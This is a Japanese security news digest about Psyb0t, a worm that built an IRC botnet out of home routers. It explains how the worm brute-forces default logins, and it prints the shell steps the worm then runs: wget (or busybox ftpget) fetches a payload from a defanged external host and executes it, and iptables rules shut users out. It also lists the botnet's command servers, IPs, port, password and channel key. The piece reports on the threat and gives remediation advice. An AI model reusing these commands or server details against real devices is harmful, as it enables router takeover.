SCAN DISPATCH は、アメリカのセキュリティ業界及ハッカーコミュニティから届いたニュースを、狭く絞り込み、深く掘り下げて掲載します。── ダン・カミンスキーがDNSプロトコルの脆弱性を指摘してから一年ほど経つ。もともと学術用として開発されたインターネットで使用されているプロトコルの多くは、大幅なアップデートもされることなく現在でも使用されている。インターネットというインフラ自体の脆弱性をカミンスキー氏は指摘した訳だが、今回と次回の2回にわたって、インフラを対象とした新種の攻撃をレポートしたい。 まずは、Psyb0t(サイボット)と呼ばれるルータ専用のワーム。ルータを攻撃対象としたボットネット・ワームはこれが初めてで、このワームは最初、主にオーストラリアで販売されているルータ Netcomm NB5に感染していることが発見され、1月にTerry Baume氏が論文を書いている。その後、攻撃に脆弱性を持つのは、「Linux mipselのルータで、ルータ管理インターフェイスがあるか、DMZにsshdかtelnetdができ、ユーザーネームとパスワードがデフォルトであるなど弱い組み合わせであるもの」ということが分かっている。mipselとは、MIPSがlittle-endian modeで動作しているもので、OpenWRT and DD-WRTなどのカスタムファームウェアを動作させているものも危ない。 現在までに10万台のモデムが被害にあっていると、感染マシンの乱用を阻止することを目的にIPアドレスをリアルタイムで監視しているDroneBLでは推測している。 さてその感染方法だが、まずワームはユーザーネームとパスワードを、ブルートフォース、パケット検査等の数種類の攻撃方法を使用して手に入れる。次にshellを使用する。そして# rm -f /var/tmp/udhcpc.env# wgetして、wget がある場合 hxxp://dweb.webhop.net/.bb/udhcpc.env をダウンロードしてこれを走らす。wget がない場合は、 "busybox ftpget" を探し出してtftpクライアントを使い、同様に上記プログラムをダウロードする。そして、# iptables -A INPUT -p tcp ─dport 23 -j DROP# iptables -A INPUT -p tcp ─dport 22 -j DROP# iptables -A INPUT -p tcp ─dport 80 -j DROPして、ユーザーをルータから排除する。 これで分かるように、ルータが感染された症状としてポート23, 22, 80がブロックされてしまう。これらのポートがブロックされていたら、Psyb0tの感染と疑い、ルータをハードリセットし、パスワードを変更して最新のファームウェアにアップデートすることが必要だ。 さて、一度ルータが感染されると、そのルータはIRCボットネットになってしまう。Command and control server: strcpy.us.toIP: 207.155.1.5 (master controller, Windstream Communications AS16687)IP: 202.67.218.33 (backup controller? HKnet/REACH AS?????)Port: 5050Password: $!0@Channel: #mipselKey: %#8bNickPattern: [NIP]-[A-Z/0-9]{9}BotController: DRSDroneURL: hxxp://nenolod.net/~nenolod/psyb0t/udhcpc.env (backup copy, i did not write it) このPsyb0tについて、1月に論文を書いたTerry Baume氏によれば、strcpy.us.toのサーバーはstrcpy.us.to = 202.71.102.110 (Malaysia)strcpy.us.to = 202.67.218.33 (Hong Kong)strcpy.us.to = 216.199.217.170 (USA)strcpy.us.to = 207.155.1.5 (USA)らのラウンドロビンになっているそうだ。 オーストラリアのパーソナルコンピュータマガジン Apcmag では、最新のバージョン18では、30種類のLynksys、10種類のNetgear、そしてその他15種類のケーブルやDSLモデムのシェルコードを内蔵しているとレポートしており、ブルートフォース用のユーザーネームが全部で6,000個、パスワードも13,000個も含まれていたそうだ。 さて面白いことに、このボットネット感染劇には以下のように、3月22日に終わっている… 【執筆:米国 笠原利香】【関連リンク】Terry Baume氏論文 http://www.adam.com.au/bogaurd/PSYB0T.pdf DroneBLブログ http://www.dronebl.org/blog/ APC Magazine記事 http://apcmag.com/Content.aspx?id=3687 Dan Kaminskyブログ http://www.doxpara.com/?p=1283 ── ※ この記事は Scan購読会員向け記事をダイジェスト掲載しました 購読会員登録案内 http://www.ns-research.jp/cgi-bin/ct/p.cgi?w02_ssw
